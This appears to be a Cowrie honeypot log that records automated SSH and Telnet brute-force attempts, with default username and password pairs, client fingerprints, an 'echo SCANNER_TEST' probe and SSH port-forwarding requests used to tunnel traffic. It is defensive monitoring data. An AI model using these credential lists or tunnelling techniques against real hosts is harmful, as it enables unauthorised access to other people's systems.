{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:36:38.774813Z","src_ip":"212.227.235.229","session":"4cfacee83d06"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:43.581878Z","src_ip":"212.227.235.229","session":"6838a655a918"}
{"eventid":"cowrie.login.failed","username":"test","password":"654321","message":"login attempt [test/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:36:44.121398Z","src_ip":"212.227.235.229","session":"4cfacee83d06"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:46.467674Z","src_ip":"212.227.235.229","session":"4cfacee83d06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35128,"dst_ip":"1.2.3.4","dst_port":22,"session":"c540bd2ccf1e","protocol":"ssh","message":"New connection: 212.227.125.160:35128 (1.2.3.4:22) [session: c540bd2ccf1e]","sensor":"my-vps","timestamp":"2025-08-26T23:36:49.729644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:36:49.730653Z","src_ip":"212.227.125.160","session":"c540bd2ccf1e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:36:49.849895Z","src_ip":"212.227.125.160","session":"c540bd2ccf1e"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:59.730984Z","src_ip":"212.227.125.160","session":"c540bd2ccf1e"}
{"eventid":"cowrie.session.closed","duration":31.361603498458862,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:08.135483Z","src_ip":"212.227.235.229","session":"fa16b916482a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35426,"dst_ip":"1.2.3.4","dst_port":23,"session":"71de9422a529","protocol":"telnet","message":"New connection: 212.227.235.229:35426 (1.2.3.4:23) [session: 71de9422a529]","sensor":"my-vps","timestamp":"2025-08-26T23:37:45.429722Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T23:37:46.290452Z","src_ip":"212.227.235.229","session":"71de9422a529"}
{"eventid":"cowrie.session.closed","duration":3.232438802719116,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:48.662111Z","src_ip":"212.227.235.229","session":"71de9422a529"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35432,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ea1f5cc2fab","protocol":"telnet","message":"New connection: 212.227.235.229:35432 (1.2.3.4:23) [session: 2ea1f5cc2fab]","sensor":"my-vps","timestamp":"2025-08-26T23:37:49.015965Z"}
{"eventid":"cowrie.session.closed","duration":1.3237886428833008,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:50.339678Z","src_ip":"212.227.235.229","session":"2ea1f5cc2fab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35448,"dst_ip":"1.2.3.4","dst_port":23,"session":"89849ea7d810","protocol":"telnet","message":"New connection: 212.227.235.229:35448 (1.2.3.4:23) [session: 89849ea7d810]","sensor":"my-vps","timestamp":"2025-08-26T23:37:52.216445Z"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T23:37:53.501289Z","src_ip":"212.227.235.229","session":"89849ea7d810"}
{"eventid":"cowrie.session.connect","src_ip":"3.134.148.59","src_port":60204,"dst_ip":"1.2.3.4","dst_port":22,"session":"491940c2b428","protocol":"ssh","message":"New connection: 3.134.148.59:60204 (1.2.3.4:22) [session: 491940c2b428]","sensor":"my-vps","timestamp":"2025-08-26T23:37:53.705831Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T23:37:53.707738Z","src_ip":"3.134.148.59","session":"491940c2b428"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:53.708350Z","src_ip":"3.134.148.59","session":"491940c2b428"}
{"eventid":"cowrie.session.connect","src_ip":"3.134.148.59","src_port":60206,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f3ef1f3c4ad","protocol":"ssh","message":"New connection: 3.134.148.59:60206 (1.2.3.4:22) [session: 1f3ef1f3c4ad]","sensor":"my-vps","timestamp":"2025-08-26T23:37:55.196588Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:37:55.206233Z","src_ip":"3.134.148.59","session":"1f3ef1f3c4ad"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:55.207280Z","src_ip":"3.134.148.59","session":"1f3ef1f3c4ad"}
{"eventid":"cowrie.session.closed","duration":3.677457571029663,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:55.893833Z","src_ip":"212.227.235.229","session":"89849ea7d810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37356,"dst_ip":"1.2.3.4","dst_port":23,"session":"27b322a1aeb8","protocol":"telnet","message":"New connection: 212.227.235.229:37356 (1.2.3.4:23) [session: 27b322a1aeb8]","sensor":"my-vps","timestamp":"2025-08-26T23:37:56.233486Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T23:37:56.969519Z","src_ip":"212.227.235.229","session":"27b322a1aeb8"}
{"eventid":"cowrie.session.closed","duration":3.0583508014678955,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:37:59.290584Z","src_ip":"212.227.235.229","session":"27b322a1aeb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37370,"dst_ip":"1.2.3.4","dst_port":23,"session":"03b65e70b85a","protocol":"telnet","message":"New connection: 212.227.235.229:37370 (1.2.3.4:23) [session: 03b65e70b85a]","sensor":"my-vps","timestamp":"2025-08-26T23:37:59.626987Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T23:38:00.391857Z","src_ip":"212.227.235.229","session":"03b65e70b85a"}
{"eventid":"cowrie.session.closed","duration":3.0238962173461914,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:02.650816Z","src_ip":"212.227.235.229","session":"03b65e70b85a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37374,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ad28391df41","protocol":"telnet","message":"New connection: 212.227.235.229:37374 (1.2.3.4:23) [session: 3ad28391df41]","sensor":"my-vps","timestamp":"2025-08-26T23:38:03.018257Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T23:38:03.765799Z","src_ip":"212.227.235.229","session":"3ad28391df41"}
{"eventid":"cowrie.session.closed","duration":3.018233060836792,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:06.036404Z","src_ip":"212.227.235.229","session":"3ad28391df41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33522,"dst_ip":"1.2.3.4","dst_port":23,"session":"32b48335870d","protocol":"telnet","message":"New connection: 212.227.235.229:33522 (1.2.3.4:23) [session: 32b48335870d]","sensor":"my-vps","timestamp":"2025-08-26T23:38:06.397397Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T23:38:07.176667Z","src_ip":"212.227.235.229","session":"32b48335870d"}
{"eventid":"cowrie.session.closed","duration":4.642019033432007,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:11.039289Z","src_ip":"212.227.235.229","session":"32b48335870d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33528,"dst_ip":"1.2.3.4","dst_port":23,"session":"802188dc00ac","protocol":"telnet","message":"New connection: 212.227.235.229:33528 (1.2.3.4:23) [session: 802188dc00ac]","sensor":"my-vps","timestamp":"2025-08-26T23:38:11.402548Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:38:12.194415Z","src_ip":"212.227.235.229","session":"802188dc00ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:38:12.215610Z","src_ip":"212.227.235.229","session":"802188dc00ac"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T23:38:12.578078Z","src_ip":"212.227.235.229","session":"802188dc00ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:13.864420Z","src_ip":"212.227.235.229","session":"802188dc00ac"}
{"eventid":"cowrie.session.closed","duration":2.4672703742980957,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:13.869758Z","src_ip":"212.227.235.229","session":"802188dc00ac"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":48242,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b46bb80534","protocol":"ssh","message":"New connection: 93.123.109.189:48242 (1.2.3.4:22) [session: c1b46bb80534]","sensor":"my-vps","timestamp":"2025-08-26T23:38:14.978554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:38:14.979461Z","src_ip":"93.123.109.189","session":"c1b46bb80534"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T23:38:14.998770Z","src_ip":"93.123.109.189","session":"c1b46bb80534"}
{"eventid":"cowrie.login.failed","username":"validator","password":"Aa123456","message":"login attempt [validator/Aa123456] failed","sensor":"my-vps","timestamp":"2025-08-26T23:38:15.058729Z","src_ip":"93.123.109.189","session":"c1b46bb80534"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:16.080369Z","src_ip":"93.123.109.189","session":"c1b46bb80534"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":33806,"dst_ip":"1.2.3.4","dst_port":22,"session":"e083a6744c38","protocol":"ssh","message":"New connection: 194.0.234.21:33806 (1.2.3.4:22) [session: e083a6744c38]","sensor":"my-vps","timestamp":"2025-08-26T23:38:46.770007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T23:38:46.772124Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T23:38:46.792032Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:38:46.865655Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.154.170.203","dst_port":443,"src_ip":"194.0.234.21","src_port":53858,"message":"direct-tcp connection request to 54.154.170.203:443 from 127.0.0.1:53858","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.281559Z","session":"e083a6744c38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.154.170.203","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03^\\xba\\xeb\\x84xE\\xb6\\x86\\xbc*:>\\xf5Gq\\xb1ax\\xd8\\xe47M\\x1c\\xc0o\\xca\\xfc\\x0b\\x1d&\\x06\\x86 \\xd8\\xe3\\xe3\\x0b\\xf7L?\\xcb2\\xe2,\\xd9D^\\xd6w(@4\\xbdDXZ\\x19\\xda\\xf7\\xfc\\xc9Q\\xc0\\x12\\xca\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x00\\xa0\\xf4#\\xcbp\\xee\\xb8\\xfa\\xbfZ\\x0f\\x87\\x1f,\\xb7\\x91G\\xb0\\xcc\\xf4\\x9b)\\x0b\\xd9\\xf0\\xec\\xbeq\\xf3~+\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.154.170.203:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03^\\xba\\xeb\\x84xE\\xb6\\x86\\xbc*:>\\xf5Gq\\xb1ax\\xd8\\xe47M\\x1c\\xc0o\\xca\\xfc\\x0b\\x1d&\\x06\\x86 \\xd8\\xe3\\xe3\\x0b\\xf7L?\\xcb2\\xe2,\\xd9D^\\xd6w(@4\\xbdDXZ\\x19\\xda\\xf7\\xfc\\xc9Q\\xc0\\x12\\xca\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x00\\xa0\\xf4#\\xcbp\\xee\\xb8\\xfa\\xbfZ\\x0f\\x87\\x1f,\\xb7\\x91G\\xb0\\xcc\\xf4\\x9b)\\x0b\\xd9\\xf0\\xec\\xbeq\\xf3~+\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.306287Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"194.0.234.21","src_port":53940,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:53940","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.323188Z","session":"e083a6744c38"}
